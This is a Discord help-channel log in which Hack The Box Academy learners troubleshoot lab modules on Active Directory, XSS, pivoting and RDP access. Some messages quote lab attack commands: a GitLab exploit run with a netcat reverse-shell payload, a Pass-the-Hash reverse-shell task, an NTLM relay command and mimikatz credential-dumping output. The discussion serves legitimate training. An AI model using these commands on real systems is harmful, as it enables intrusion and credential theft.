I can't give you the answer but try to be aggressive with your scans... from there you should see what is vulnerable and how to abuse this

dense mesa
#

Doing the AD Administration: Guided Lab Part II at the moment, where 2 boxes are spawned.
https://academy.hackthebox.com/module/74/section/1393

The first target works, the second, a domain controller does not, with the same credentials.

Target(s): 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01)

RDP to 10.129.x.x (ACADEMY-IAD-WIN10) ,10.129.x.x (ACADEMY-IAD-DC01) with user "image" and password "Academy_student_AD!"

Thats the output when i try to connect the DC:

└╼smp$xfreerdp /v:$TGT /u:image /p:'Academy_student_AD!' /dynamic-resolution
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:39:43:052] [56729:56730] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL
[18:39:50:167] [56729:56730] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:39:50:167] [56729:56730] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

I've acepted the certificate on my first connection attemp already. I'm not sure if the domain name should match the one from the section. In the section is says ACADEMY-IAD-DC01 but i get ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL in the cert.

fathom pendant
#

LOGON_FAILURE is an issue with the username/pw

gloomy stump
#

But can I use Hydra or do I have to use o365spray?

glass locust
fathom pendant
glass locust
fathom pendant
#

o365 is more specific to office 365

dense mesa
gloomy stump
#

okay I will try hydra again thanks 🙂

compact patrolBOT
glass locust
gloomy stump
#

Can I use the command from the lecture? 😮

mighty shell
digital pendant
#

Sure @mighty shell

pseudo forge
#

Hello! i do have a question part of the penetration tester path - Web Enumeration. Anyone working on?

gloomy stump
abstract ingot
#

hi, can anybody help me with noctural box?

winged steeple
#

anyone free to help me on the advanced xss skills assessment part please? I can browse to my payload and trigger a chain that causes a user to be promoted. But when I put it into a payload on the exploit server and send to victim it always asks for a login, when I try xhr with credentials it gets blocked.

pseudo forge
#

I tried adding a DNS Server 1.1.1.1 to the /etc/resolv.conf file, so the target the domain will be inlanefreight.com but won't save?

glass locust
winged steeple
#

think I may have got it now 😄

fathom pendant
fathom pendant
winged steeple
#

okay so the payload works when I view it, but when I send to victim it doesnt work ?

rich salmon
#

I know that this doesn't belong here but i don't kow where to ask. I want to do the starting point machines on the main htb site but i can't spawn any machine. Can anybody help?

acoustic owl
winged steeple
rich salmon
#

i did that

rich salmon
radiant thunder
#

I found I was performing a bit of a schoolboy error and forgetting to remove to remove newlines from the output prior to encrypting it...once I did that it worked for me

acoustic owl
rich salmon
pseudo forge
#

@fathom pendant

jaunty grove
#

Hi

#

Can someone teach me how to hack.

compact patrolBOT
dark hedge
jaunty grove
#

Can you hack using a phone?

dark hedge
#

even if you could, you're better off using a PC..

distant gate
#

I am on the CPTS path and at the Attacking Common services. at the 3 last exerciese labs Easy, Medium, Hard. Is it me or is the EASY lab quite hard . I am scared of starting the Medium and Hard ones hahaha

polar iris
#

Can someone save me?

academy.hackthebox.com/module/147/section/1638

Question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Steps Performed:

1)Using Julio’s hash, performed a Pass the Hash attack, launched a PowerShell

  1. Created payload(powershell64) via https://www.revshells.com/ IP: 172.16.1.5 Port: 8888

3)In powershell Import-Module .\Invoke-WMIExec.ps1

  1. Invoke-WMIExec -Target 172.16.1.10 -DOMAIN inlanefreight.htb -Username julio -Hash <Julio hash> -Command "<Generated payload>"

  2. listener that is running CMD not receiving the shell via nc listener on port 8888

What am I doing wrong?

modest stream
#

i am getting an error message of there are no available instances

#

okay we up

strange pivot
#

Anyone done the advanced xss & csrf module wana give me a hand? I can make the payload work on myself and it attempts to promote the user correctly, but when I send it to the victim, my user isn't promoted? Ive used the open redirect etc..

mellow niche
#

do you recommend completing all tier 0 modules (given that they are effectively free)?

tiny frigate
fathom pendant
#

there's a wide breadth of knowledge that they cover, however some of the modules step over each other and cover essentially the same thing (same topic but more generic); it wouldn't hurt but it would take a while

tiny frigate
# fathom pendant there's a wide breadth of knowledge that they cover, however some of the modules...

oh wow, yeah I just checked, there's a lot more Tier 0 in there than I thought!
But I mean, before committing to a subscription, might as well.

Personally I feel like I should've started with paths much sooner though, as dumb as it sounds, but I figured that out only later - that all those basic things like "how do I actually connect to a machine through PwnBox" are explained somewhere, and you don't HAVE to fumble your way through everything ^^

#

As I remember, when first signing up on HTB, it was not as obvious where to start, I remember being a bit overwhelmed. My excitement kept me going, just could've saved a few "duh" moments

dawn garnet
#

hi everybody, i just joined the discord community beacuse i got some problems with "Linux Fondamentals". Can i ask here or there is a specific channel or # where i can ask for help. Thankssss

flint saddle
#

hey, can i dm someone about the last question in the Android Fundamentals module ? im asked to sign an .apk file on android studio but i get errors

tiny frigate
dawn cove
#

Hi, in AV Evasion Dynamic Analysis section, I am trying to use the AES technique but I am getting this error

wary sky
#

Hi, does anyone know why in the Attacking Common Services module, in the Attacking FTP section, when asked “What username is available for the FTP server?” the answer anonymous does not fit, although clearly anonymous login is possible. Can anyone tell me what I'm doing wrong?

dawn garnet
fathom pendant
dim gale
#

does anyone know where i can ask for direction on a machine i'm doing?

#

it says no access for me

dim gale
#

thank you 🙏

terse sedge
#

I'm in shells & payloads - the live engagement. I've been trying for days to get this to work. I create a payload and upload it to the server, but I keep getting an error page on the server: HTTP Status 500 – Internal Server Error. What am I doing wrong?

west arrow
#

is this the correct format or am i tripping?

terse sedge
#

mmmm...not sure about that 3 after xfreerdp, and never seen quotes around the password

west arrow
#

if always been using xfreerdp3

#

and quotes because otherwise it thinks the ! is a command

#

never mind

#

now it works, i guess i had to wait like 5 min until the target fully loaded

hollow kite
#

Hey

craggy edge
#

this also didn't work for me.. I used (like you already tried) cURL to get the flag

golden plume
#

Hey pals ,
I am doing Information gathering web edition , And I have been stuck at this third question in the skill assessment

What is the API key in the hidden admin directory that you have discovered on the target system?

craggy edge
#

I later retried the question using ligolo-ng (which is not covered, but I highly recommend checking it out) and managed to load it up

cunning berry
craggy edge
cunning berry
quasi wave
#

hi on the socat redirection with bindshell section of pivoting tunneling and port forwarding module I am doing the exact instructions and the shell successfully establishes but then dies immediately preventing me from actually getting a bind shell. I tried using versions of the exploit for linux and windows and tried playing with it and I come closest when following the exact instructions as that's the only way it doesn't get blocked.

what am I doing wrong? by the way, I hope I'm not spoiling too much I'm trying to be vague here.

#

but I played with IP addresses and port numbers and it appears like I am supposed to just follow instructions and the way the instructions say makes the most sense when I research it

#

like I think I understand the instructions too

hollow kite
#

Does anyone have any idea how to terminate my vpn connection in htb I closed the terminal reset the page even restarted the vm but no luck says I have 2 connection

craggy edge
hollow kite
#

Yeah i have tun0 but I can't seem to terminate it

quasi wave
#

I tried reseting the target host and it still won't work

#

I have a screenshot in case anyone wants to see it

fathom pendant
#

Never close a terminal with a running process. Always terminate the process before closing

grim plaza
#

Any one here solved assembely module ?

safe mango
hollow kite
#

Any tips on nocturnal

grim plaza
fathom pendant
real sluice
#

Intro to Sliver module question 1 fo Domain Recon section: + 1 Submit the relative identifier of the SID for user websec
i submit the user SID and Incorrect answer

fathom pendant
#

because it's asking for the RID; not the full SID

#

the RID is the last set of digits

strange pivot
#

anyone care to help on the very last part of the advanced XSS skill assessment? can't seem to wrap my head around this sql part

real sluice
#

wow i can't read

quasi wave
#

hi anyone able to help me out with the current bindshell section I'm on?

queen vessel
#

Hello apologies if this has been asked before but I am currently in the HTTP Headers section on the Web Requests module, and do not see the flag file that is to be loaded. I only see JavaScript and fonts.gstatic files. Do I need to check the js files for the flag?

gray yacht
quasi wave
#

like are you available to help? I have a screenshot of everything

#

@gray yacht or are you available later tonight or tomorrow any time?

glass locust
mortal linden
#

Going way back in the chats, but it looks like you put in an erratum for the file transfers module, living off the land lesson because of the certreq.exe -Post command. On the enterprise version at least it has not been corrected. It seems like the changes don't always carry across to the enterprise version.

glass locust
quasi wave
#

I’m taking a break until then

glass locust
dark hedge
#

not staff though, so i can't confirm

mortal linden
quasi wave
harsh gorge
#

Hey marcie havin some trouble with this, think maybe you could help me out

harsh gorge
quiet halo
#

I blocked the content and tried to keep only the relavent bits. If that's still not allowed, plz delete the picture

cloud urchin
quiet halo
#

how does this command do NTLM relay attack if the hash isn't in the command impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

cloud urchin
#

it acts as a server and receives the hash then relays those creds to different protocols

quiet halo
#

i'd have to wait for the user to authethicate again though, no?

cloud urchin
#

the whole thing is explained here

waxen totem
#

It'd be pretty rare to even use nc to transfer files IMO since there's better ways, if you absolutely have to then yes you can have the target connect back to the attacking machine using nc.exe to send a base64 of a file to your listener

wise hare
#

I purchased nitro as I just started using Discord and can't figure out how to get emoticon by the side of my name

storm elk
#

Don’t need nitro for it

wise hare
#

I usually don't use servers like these ever since the fed.

golden plume
wise hare
#

@storm elk Why did you do that

#

Moderator Badges are not the same

#

🛡 and and the administrator badge is different colors

cloud urchin
storm elk
#

Lol. You just made yourself an invalid name. Read #rules

cloud urchin
#

We don't do that here.

wise hare
#

How do I change my name back

storm elk
wise hare
storm elk
#

You didn’t follow the three simple steps.

#

Otherwise your name would’ve changed

wise hare
#

Also I sent over leads to close out that module

storm elk
#

To close out that module?

cloud urchin
wise hare
cloud urchin
# wise hare Not for you HTB Work here

I don't think this is the server for you. This server is for discussion about Hack The Box's various platforms. Take your general talk to #general, access it by following the instructions in #welcome, and don't advertise your own services.

wise hare
#

It is HTB

#

Hacking The Box

#

No services are being sold or advertised

cloud urchin
#

Okay great, take the chatter to #general please

wise hare
#

Just guidance for others to complete HTB Modules which I have done years ago!

wise hare
cloud urchin
wise hare
cloud urchin
wise hare
#

Yes almost 9 years ago

wary sky
golden plume
#

There is actually two questions regarding that api key

Q3. What is the API key in the hidden admin directory that you have discovered on the target system ?

And

Q5. What is the API key the inlanefreight.htb developers will be changing too

I got the right answer for Q5 but i am stuck at Q3

Edit : nevermind I solved that

weary geode
# wise hare Re read what if my HTB account is about 2 decades old

You're account just pasted 2 months old on Discord. And I don't appreciate suspicious accounts friend requesting me out of the blue. Especially when you're name in my request is LulzSec and here it is Jack McVerify? And considering that you're having trouble figuring out how to use Discord properly. 🤣 Not a good sign!

wise hare
faint geode
#

This guy 😂

tropic pollen
#

Module: Attacking Common Applications
Section: Attacking GitLab
Challange: Gain remote code execution on the GitLab instance? Submit the flag in the directory you land in.

My Question: When I run below command with different users (authenticated e.g. my own created user or new discovered) I am getting an error message, that the djvumake is not installed, which is one of the dependecies djvulibre-bin packages. Is the goal to use a different payload then one presented in the module?
-> python3 49951.py -t http://gitlab.inlanefreight.local:8081/ -u sxxx -p 'Passxxx' -c 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.xx.xx 8443 >/tmp/f'

[1] Authenticating
/home/xxx/49951.py:35: DeprecationWarning: Call to deprecated method findAll. (Replaced by find_all) -- Deprecated since version 4.0.0.
token = soup.findAll('meta')[16].get("content")
Successfully Authenticated
[2] Creating Payload
djvumake not installed. Install by running command : sudo apt install djvulibre-bin`

rustic sage
#

Thanks HackTheBox.

ocean night
autumn pilot
#

it is

ocean night
#

Where?

#

Honestly.. purple

#

How did marketing not throw a fit

#

🤣

#

All good, just didn't recognise it

rustic sage
ocean night
#

Fair enough

modest stream
#

hey guys noob question here
how can I take detailed notes while going through the cpts modules

storm elk
#

There is no golden way to do it. But a lot of people here use Obsidian and save notes per module

rustic sage
# modest stream hey guys noob question here how can I take detailed notes while going through t...

Start organizing your notes with clear headings like module name, date, and key concepts. Bullet points for definitions, code descriptions, and common use cases. Highlight exceptions or important details, and try to summarize each section in your own words to reinforce understanding. Diagrams or flowcharts for complex concepts can help. Also make sure to review your notes regularly to keep the information fresh in your human CPU. brainonfire

For the software, I use Obsidian myself, but there's a lot of options to choose from.

modest stream
#

thank you guys peepocowboylove

rapid wharf
#

Hi, In the module Pivoting, Tunneling, and Port Forwarding , in the section of RDP and SOCKS Tunneling with SocksOverRDP. I'm struggling hard to get the flag, I have everything set up but when attempting the RDP it fails probably due to the Firewall. There is a hint (Jason is a local account and a Defender may try to stand in your way.), but I cant think of a way to bypass de defender.

#

Anyone can help?

opal nexus
#

Where do i report a typo in one of the modules?

rustic sage
rapid wharf
#

But How can I disable the defender for the target machine if i don't have acces?, Or I only have to disable the defender of the pivot machine?

trail flicker
#

Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"

waxen totem
calm swan
#

I have a hard time with Credential Hunting in Windows questions.
I downloaded the Lazagne repo and im trying to make it work on the target Windows system but nothing seems to be working.
I already tried making the executable file on BOTH Linux and Windows but it only gets created on Linux (because python is installed there).
I searched a little and to make an executable file on Windows target I need to run the following command pyinstaller --onefile -w lazagne.spec but the problem is Python is NOT installed on the target system
what can I do to make it work?

waxen totem
calm swan
#

where can I look for pre-compiled binaries haha

waxen totem
#

there's literally an exe available

gray yacht
calm swan
#

thx

gray yacht
calm swan
prisma wing
#

Hi all,

stuck on Windows Privilege Escalation SeDebugPrivilege, get an error when using mimikatz method and no output at all when using psgetsys.ps1.
Mimikatz output is as follows

'mimikatz # privilege::debug
Privilege '20' OK

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000002)'

Psgetsys output is as follows

'PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"cmd.exe","")
PS C:\Users\Jordan\Desktop> .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(4140,"c:\Windows\System32\cmd.exe","")
PS C:\Users\Jordan\Desktop>'

Can someone help with this please?

I've searched the issue in discord but can't find any helpful material

trail flicker
#

Can not solve this one even though i followed everything " Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)"

gray yacht
jolly yacht
#

Thank you so much for your response, now i have a better understanding 👍😄

fading olive
#

Hi, sorry I couldn't answer earlier but that's not true. In the module Attacking Enterprise Network the lesson shows the hosts file and they don't have the http:// prefix. Plus, eyewitness actually offers to prepend http or https with flags. To finish, I've run successfully eyewitness before and I've managed to do it before with and without the prefix.

#

I can't put my finger on why exactly eyewitness works sometimes and doesn't work most of the time, I'm suspecting it's due to selenium or browsers errors.... Adding the http:// prefix doesn't solve my issue here.

prisma wing
gray yacht
#

If you're not understanding, you can DM.

winged steeple
#

Anyone wana help me on the advanced xss and csrf part? Im struggling on the last sql injection part

winged steeple
#

So I've found the additional endpoint and I can get data back with 1'1=1 etc..., it shows two columns, but when I inject into either of them I get {"error":"Something went wrong"}, anyone done the advanced xss and csrf skills assessment can help ?

dense crane
#

Hi, I've started the Pentest in a Nutshell module, and in the topic 'Linux System Enumeration'.

When I try to install linpeas from github, the connection on the virtual machine always times out. Any way out for this thing?

flint saddle
#

the answer is the first part of the spoil

prisma wing
devout panther
#

Can anyone help me? I know what the benefit of open ports is.

bronze wharf
#

guys and help in this ??

fathom pendant
barren apex
#

Hey guys, I'm working on the first assessment in AD attacks & Enumeration module and I got stuck, can anyone help?
I don't want to spoil the answers but I'd be glad to discuss it in DMs.

eager ledge
#

Hi

Module: Windows Privilege Escalation
Section: Pillaging

I am reading the text on mRemoteNG. It says that we can crack either Protected attribute or Password attribute. But I don't understand how we can do that when we don't know the master password?

barren apex
#

After seeing the above message I thought I'd make mine similarly better 😅
Module: AD Enumeration & Attacks
Section: Skill Assessment 1

Answered the first 3 questions and now onto the 4th.
(Submit the content of the flag.txt file on the Administrator desktop on MS01).
I'm stuck at this level, appreciate any kind of help

vernal trench
#

Can anyone help me? I am looking for anyone who has worked in the digital forensics field for a mentorship project I am working on. I’m just looking to ask a couple basic questions about the work you do and what your path to getting there might have looked like. If anyone knows someone that can help please send them my way. Thanks

fathom pendant
fading olive
#

Just a follow-up to some questions that I've asked earlier, I've had trouble with running eyewitness at all because of invalid headers issue, I've had trouble with aquatone because it wouldn't manage to take screenshots (error 21 or something) and I've now found gowitness which I've found works very well (on my arch linux set up at least) so if anybody has trouble with screenshot tools, I recommend trying gowitness

winged steeple
#

has anyone done the advanced xss & csrf can dm me please?

turbid panther
#

Hello all, I have a technical issue I was hoping to get some help with. I am in the Getting Started module for the Pentesting pathway in Academy.

I have had consistent issues when on a target system to getting network traffic from my attacker. E.g., revshells never connect, I dont see any traffic in my http server logs when performing a request, etc. Scanning the target system or interacting to it from attacker are not an issue.

I have also used ports that are known to be open on the target.

I am using my tun0 address and have disabled my firewal. My VM is using a NAT connection. I have also toggled between the UDP and TCP ovpn packages and switched VPN servers with no change in behavior.

#

Does anyone have some ideas of the issue here?

fathom pendant
#

If it's a public_ip:port; revshells won't be available

turbid panther
fathom pendant
#

Also it wouldn't be http connections for revshells, at least not typically

turbid panther
fathom pendant
#

As far as issues, making sure you have the right ip for the revshell, and the tight port

fathom pendant
#

You can trigger the payload over http: but it doesn't use http to call back

turbid panther
#

in these cases I mean that I request a transfer to transfer to target from attacker to then execute on target via wget or similar

fathom pendant
#

Also: don't use your own vm and the pwnbox at the same time

#

This is a common enough issue

turbid panther
#

I dont use the pwnbox. So it seems any traffic (revshell or http requests) do not make it back to attacker for some reason

fathom pendant
#

¯_(ツ)_/¯

#

I've never had issues so I couldn't tell you where to pinpoint the issue at

#

Most pentest distros don't have a firewall on by default

turbid panther
#

right, it's a confusing issue. Havent had it with HTB boxes or with other lab environments such as Offsec

#

back to google...

#

thank you for your time though

fathom pendant
#

Try changing vpn regions to regenerate your vpn file

#

And making sure you don't somehow have multiple connections going

#

sudo killall openvpn

turbid panther
fathom pendant
eager ledge
fathom pendant
#

It also tells you the location of the configuration file

fathom pendant
eager ledge
#

I will try to put forward without spoiling the content as much as I can.

So, in case of DPAPI encryption, its straight forward. But when the config file is protected by user chosen password, it is shown to apply for loop. But how does one verify when it doesn't know both the config master password and decrypted remote service password?

misty current
misty current
burnt jay
#

Is there any way to send a file from my machine to the PwnBox ?
Copy-Paste doesn't for a reason.

cloud urchin
#

@fleet jay No. This discord is about HackTheBox and the various platforms.

fleet jay
#

Ok thanks

strange pivot
#

anyone want to help me on the advanced xss skills assessment please? almost done it but can't get payload to exfiltrate data at end keep getting error

leaden island
#

The section mentions both

#

Password attacks section 2

#

Idk if its a typo or theyre 2 seperate things

rustic sage
#

It’s commonly associated with the SSPI used for auth protocols and services.

#

Likely a typo.

leaden island
#

got it

proven karma
#

hello , im doing some modules and got some problem. The problem is that there is an zip arhive i need to download and open. But im using HTB virtual Parrot. How can i drop this zip on vm? or maybe there is another way to got archive

gray yacht
dawn cove
#

Sure, thanks.

cloud urchin
#

@strange pivot Please don't post content from modules above tier 0

strange pivot
#

ok my bad

#

am I on the right track then 😄 ?

fathom pendant
next musk
#

I have a dumb question lol

#

Trying to do this module Analyzing Evil With Sysmon & Event Logs, but how do i get to a windows machine, should i be using the open vpn connection with a copy of vmware ?

dawn cove
#

Dear team, the module Introduction to Windows Evasion Techniques contains some issues and it is difficult to complete each lab due to some errors, kindly check it.

dapper moth
dawn cove
dapper moth
#

Which section?

dawn cove
#

both Process Injection & Dynamic Analysis

dapper moth
#

Iirc the dynamic analysis section will depend on which approach you take for your code as all the section run a check with a specific signature

#

I can check my notes if I have the code I used (which should not be too far from what’s in the module)

fathom pendant
#

please take discussion to DMs to avoid spoilers

next musk
#

So if im trying to connect to a windows machine for a lab ; how am i supposed to be connecting to that, the RDP doesn't work , and if i go into pwnbox wihich is a linux system , and rdp the internet doesn't work there, and i have to install sysmon

golden gate
#

i dont know much about this but you should use xfreerdp to access it

#

or you can just ssh to the box

fathom pendant
#

the labs will tell you how they expect you to connect, most of the time

next musk
#

well im trying to do this Windows Event Logs & Finding Evil

#

which gives me a target, but i can't rdp from my personal computer to that rdp

dapper moth
#

Or use the Pwnbox

next musk
#

yeah i have the vpn installed, the pwnbox is linux though

#

and i can rdp to a windows device from the pwnbox

#

but theres no internet to install the sysmon

fathom pendant
#

it should already be installed

#

C:\tools is typically where most tools are for academy targets

#

and typically this location is told to you in the reading

brave prawn
glass locust
next musk
#

lol

#

i tried to open the C: drive with it and it says this app cant run on your pc

calm sun
#

why windows rdp fro windows log disconnect constantly

#

i checked my connection its pretty stable

#

tried changing vpn servers and in middle of my Skills Assessment it disconnected

#

3 times

dapper moth
spark scroll
#

hola, alguien de Habla hispana que me ayude en unos problemas que tengo al conectarme al vpn?

spark scroll
fathom pendant
compact patrolBOT
fathom pendant
#

also: this is an english only/primary server (see #rules )

dark hedge
#

that's illegal

lone anvil
#

which legal system are we abiding by again?

fathom pendant
#

US/EU/Whichever place the company is based in

#

this isn't a point of argument

lone anvil
#

just curious sadglas

glacial leaf
#

I'm in the Linux Fundamentals: Filter Content module and cannot get the curl command to connect to the required website. The connection always times out.

For reference, the exact question is, "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer. "

waxen totem
#

@glacial leaf ^

waxen totem
glacial leaf
waxen totem
#

You able to connect to the Internet on that machine?

glacial leaf
#

And I'm only using the pwnbox as far as I can tell. Never figured out the VPN connection.

glacial leaf
waxen totem
cloud urchin
#

Pwnbox's Internet connectivity is limited, you can unlock more by spending money on the site. I believe regardless, the limitation isn't in place for inlanefreight.com because HTB owns that domain, but I could be misremembering the exact facts

#

On the HTB Labs:

Free Users have a single two hour session of Pwnbox available for the life of their account, as a way to test out it's features. Free users also have limited internet access, with only our own target systems and GitHub being allowed.

VIP users have a limit of 24 hours per month to use their Pwnbox. This limit gets renewed with each month that you renew your VIP Subscription

VIP+ users have unlimited use of Pwnbox.
#

i guess that only speaks about the time limit not internet access

#

oh no it's right there: Free users also have limited internet access, with only our own target systems and GitHub being allowed.

#

so pwnbox should be able to reach the site

#

probably have to reach out to support to find out why it's not connecting, if you spin up your own VM you can do it from there too.

glacial leaf
#

I've never used a VM before, can you point me towards some instructions?

cloud urchin
#

Should find a lot of results by just googling install parrotos/kali virtual machine

#

it boils down to installing a hypervisor to your computer then installing an OS inside the hypervisor

quasi wave
#

I got the socat redirection with bind shell section's steps completed

#

the way the section says to do it is messed up

#

but I figured it out with some help from @gray yacht

#

I mean it was a couple minor things I needed to do

#

the way the section says to do it doesn't work is the main issue

#

there's some stuff that needs to be modified

#

that is all I'll say

waxen totem
#

you know this, you've been doing academy for long enough

leaden island
#

openssl aes-256 -d -in <ciphertext file> -out <decrypted> -k <password> ?

#

The one for encrypting on windows is mentioned in the module i forgor it

uneven solstice
#

hi

#

i m trying to rdp to dis lab target from long itme

#

i dont get it...

cloud urchin
waxen totem
#

xfreerdp /v:<ip> /u:htb-student /p:Academy_WinFun!

uneven solstice
#

mb

#

but even with sxfreerdp same thing happens

cloud urchin
#

you're starting the command by pasting in from another terminal or the module's page

#

it starts with your hack the box name StringrayX

#

that's not a command, so you need to drop that part and just use xfreerdp/xfreerdp3

#

also wrap the password in single quotes

uneven solstice
cloud urchin
#

also what module and section is this

uneven solstice
uneven solstice
#

introduction to windows section

cloud urchin
#

you can't minimize the terminal and see wallpaper etc?

#

i have to go so i can't really help much, but it sounds like you don't have a graphical environment. might be easier to run a virtual machine on your host instead of pwnbox, unless it's supposed to be like that i'm not sure for that module.

uneven solstice
uneven solstice
#

any1 who can help me figure dis out?

cloud urchin
#

also if you're ssh'd into a machine you won't be able to rdp from that terminal

uneven solstice
#

i dont think ive done dat tho

#

[!bash!]$ xfreerdp /v:<targetIp> /u:htb-student /p:Password
when i reloaded the syntax in the theory changed to dis but it dint work either

uneven solstice
#

bruh

#

anyone who can help w/ dis issue?

limpid void
#

have you tried this using the openvpn instead of pwn box?

uneven solstice
#

look
the prob is i cant

limpid void
#

okok

uneven solstice
#

dont ask why i js cant

#

isnt there a way to rdp from pwnbox itself?

limpid void
#

let me try 🙂

uneven solstice
#

10.129.233.252

#

go ahead

limpid void
#

is the machine up?

uneven solstice
#

?

limpid void
#

like can yo ping the machine?

#

you*

uneven solstice
#

if ur asking if the target is still active, then yes it is

#

???

limpid void
uneven solstice
limpid void
#

PING 10.129.233.252 (10.129.233.252) 56(84) bytes of data.

--- 10.129.233.252 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3035ms

uneven solstice
#

what da haiill

limpid void
#

:))

uneven solstice
#

man if i only i knew wt i was doing

real delta
uneven solstice
#

but i have to find build no. of this target
by rdp to it

#

and thats exactly what im struggling to do
xfreerdp isnt workin

limpid void
#

can you terminate the machine and try to start it again?

uneven solstice
#

i tried [!bash!]$ b4 xfreerdp but dat dint work either

uneven solstice
limpid void
uneven solstice
#

oh shit

#

u meant da target
i accidentally terminated the instance

limpid void
uneven solstice
#

it ok il try again tmrw but rn il js give u new target

limpid void
#

yeah let me try the rdp thing till then

uneven solstice
#

hang on

#

10.129.95.252

#

@limpid void

#

if rdp works form ur vm il js ask u to tell me da build no. and windows nt ver. on it

limpid void
uneven solstice
#

np
u helped as much as u can so tysm

#

also i luv ur pfp

limpid void
#

happy to help ohh thank you so much xD

fathom pendant
fathom pendant
# uneven solstice

copy the command after the $. it looks like for whatever reason the thing didn't load, [!bash!]$ isn't anything (it's actually supposed to be the styler for the command block on the page)

uneven solstice
#

i alr did that way too many times

#

doesnt work

#

$DISPLAY error

waxen totem
waxen totem
fathom pendant
#

^

#

LMAO

#

user error

waxen totem
#

RDP = Remote DESKTOP Protocol, DESKTOP needs a display

fathom pendant
#

you need to use the in-browser visual vm; not the terminal

uneven solstice
fathom pendant
#

ALSO the in-browser terminal sucks 9/10 times

uneven solstice
fathom pendant
#

this is outside the RDP user error

fathom pendant
uneven solstice
fathom pendant
#

the terminal isn't a display

uneven solstice
fathom pendant
#

minimize the terminal; click the "fullscreen" button to open pwnbox in a new tab

fathom pendant
#

atp i'd be surprised as well if you have any time left

uneven solstice
#

oh no i terminated it so dw il try it tmrw 🤣

fathom pendant
#

after you open the pwnbox in a new tab => open a terminal in that session, then type/paste the xfreerdp command

waxen totem
fathom pendant
#

thanks w1ld

#

this is why you get the cookies Prayge

uneven solstice
#

ooohhhh
bet i got it

waxen totem
#

-# honestly just use vm + vpn, it's so much better 😭

uneven solstice
fathom pendant
#

assuming it's not your computer/it's a school/work system

#

or it's just so bad specs (somehow) that you can't

waxen totem
fathom pendant
uneven solstice
#

my computer is prolly lying in sm dusty old storeroom rn
yes this is an org pc

waxen totem
uneven solstice
#

and honetly i dt it would be possible on my pc either cuz

#

due to reasons "admin" does not exis tanymore on it

#

so basically
the only way to fix that is to boot into advanced recovery and change registry keys which is rather hard to do if u dont have pro help

fathom pendant
#

or just factory reset it

uneven solstice
fathom pendant
#

you don't need admin to do that, actually

uneven solstice
#

u dont

fathom pendant
#

you can also create a bootable usb

uneven solstice
#

but
u wont get admin rights after doin that either

#

lemme explain

fathom pendant
#

¯_(ツ)_/¯

#

but we're diving off-topic

#

so gonna cut the convo here

waxen totem